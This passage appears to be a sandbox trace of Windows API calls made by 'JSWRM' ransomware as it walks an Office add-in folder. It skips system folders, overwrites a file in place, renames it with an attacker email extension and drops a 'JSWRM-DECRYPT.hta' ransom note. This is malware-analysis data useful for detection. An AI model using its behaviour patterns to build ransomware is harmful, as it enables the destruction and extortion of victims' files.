lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0123.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.808] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0123.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0123.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0123.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0123.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0123.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d800, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0123.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ecb8 [0123.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0123.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.808] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8040, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0123.808] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.809] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0123.809] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0123.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0123.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0123.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d770, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0123.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0123.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0123.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0123.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23fa98 [0123.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0123.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0123.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0123.809] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1341a2e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15365236, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x53c40, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.el.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0123.809] lstrcmpiW (lpString1="PowerViewRes.el.xap", lpString2=".") returned 1 [0123.809] lstrcmpiW (lpString1="PowerViewRes.el.xap", lpString2="..") returned 1 [0123.809] lstrcmpiW (lpString1="PowerViewRes.el.xap", lpString2="...") returned 1 [0123.809] lstrcmpiW (lpString1="PowerViewRes.el.xap", lpString2="windows") returned -1 [0123.809] lstrcmpiW (lpString1="PowerViewRes.el.xap", lpString2="recovery") returned -1 [0123.809] lstrcmpiW (lpString1="PowerViewRes.el.xap", lpString2="perflogs") returned 1 [0123.809] lstrcmpiW (lpString1="PowerViewRes.el.xap", lpString2="documents and settings") returned 1 [0123.809] lstrcmpiW (lpString1="PowerViewRes.el.xap", lpString2="$RECYCLE.BIN") returned 1 [0123.809] lstrcmpiW (lpString1="PowerViewRes.el.xap", lpString2="system volume information") returned -1 [0123.809] lstrcmpiW (lpString1="PowerViewRes.el.xap", lpString2="msocache") returned 1 [0123.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.el.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.el.xap", cchWideChar=19, lpMultiByteStr=0x241308, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.el.xap", lpUsedDefaultChar=0x0) returned 19 [0123.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.el.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.el.xap", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.el.xap", lpUsedDefaultChar=0x0) returned 19 [0123.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0123.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\el\\PowerViewRes.el.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\el\\powerviewres.el.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.810] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=343104) returned 1 [0123.810] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.813] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0123.826] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.826] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0123.827] CloseHandle (hObject=0x338) returned 1 [0123.827] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\el\\PowerViewRes.el.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\el\\powerviewres.el.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\el\\PowerViewRes.el.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\el\\powerviewres.el.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.828] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1341a2e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15365236, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x53c40, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.el.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0123.828] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0123.829] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7582db3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0123.829] lstrcmpiW (lpString1="es", lpString2=".") returned 1 [0123.829] lstrcmpiW (lpString1="es", lpString2="..") returned 1 [0123.829] lstrcmpiW (lpString1="es", lpString2="...") returned 1 [0123.829] lstrcmpiW (lpString1="es", lpString2="windows") returned -1 [0123.829] lstrcmpiW (lpString1="es", lpString2="recovery") returned -1 [0123.829] lstrcmpiW (lpString1="es", lpString2="perflogs") returned -1 [0123.829] lstrcmpiW (lpString1="es", lpString2="documents and settings") returned 1 [0123.829] lstrcmpiW (lpString1="es", lpString2="$RECYCLE.BIN") returned 1 [0123.829] lstrcmpiW (lpString1="es", lpString2="system volume information") returned -1 [0123.829] lstrcmpiW (lpString1="es", lpString2="msocache") returned -1 [0123.829] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\es\\jswrm-decrypt.hta")) returned 0xffffffff [0123.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\es\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0123.834] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.834] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0123.835] CloseHandle (hObject=0x314) returned 1 [0123.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\es\\jswrm-decrypt.hta")) returned 0x20 [0123.835] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\es\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7582db3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4078d9fc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0123.835] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.835] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7582db3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4078d9fc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0123.835] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.835] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.835] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf75a8fbb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf75a8fbb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x153fdb85, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4e58, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0123.835] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0123.836] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0123.836] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0123.836] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0123.836] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0123.836] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0123.836] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0123.836] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.836] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0123.836] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0123.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0123.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0123.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241178, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.836] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4078d9fc, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4078d9fc, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4078d9fc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.836] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.836] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.836] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.836] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.836] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.836] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.836] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.836] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.836] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.836] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0123.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0123.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.837] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x38b7c4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x38b7c4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x38b7c4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13080, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.837] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0123.837] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 